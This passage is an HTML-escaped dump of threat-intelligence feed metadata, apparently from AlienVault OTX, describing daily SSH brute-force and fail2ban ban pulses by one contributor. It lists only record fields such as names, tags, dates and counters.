nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'SSH&nbsp;Bruteforce&nbsp;Hosts&nbsp;for&nbsp;2020-06-19',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://jamesbrine.com.au/bruteforce-ip-list-2020-06-19/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;138,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['Bruteforce',&nbsp;'SSH',&nbsp;'honeypot'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-06-17T23:05:03.413000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5eeaa19f658454cc30773dc0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-17T23:00:23.063000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'277&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-06-17&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'76fdb4c1-f709-4f45-8ecf-f5f9aa52ab55',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-06-12T23:05:02.066000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp